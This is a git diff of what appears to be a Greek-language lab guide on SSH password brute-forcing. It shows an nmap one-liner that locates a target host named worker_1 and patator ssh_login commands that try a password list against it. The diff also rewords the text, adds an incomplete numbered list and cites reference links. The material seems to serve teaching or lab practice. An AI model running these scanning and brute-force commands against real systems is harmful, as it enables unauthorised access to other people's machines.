|
|
@ -43,7 +43,9 @@ ________________________________________________________________________________ |
|
|
|
|
|
|
|
**worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** |
|
|
|
|
|
|
|
* Με την ακόλουθη εντολή εκτελείτε η επίθεση, όπου password.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό κωδικό. |
|
|
|
* Με την ακόλουθη εντολή εκτελείτεαι η επίθεση, όπου: |
|
|
|
1. password.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό κωδικό |
|
|
|
2. |
|
|
|
|
|
|
|
**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker** |
|
|
|
|
|
|
@ -52,6 +54,10 @@ ________________________________________________________________________________ |
|
|
|
**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.'** |
|
|
|
_____________________________________________________________________________________________ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
**REFERENCES** |
|
|
|
1. https://pentestit.medium.com/brute-force-from-ssh-to-web-dc0e986583ae |
|
|
|
2. https://en.kali.tools/?p=147 |
|
|
|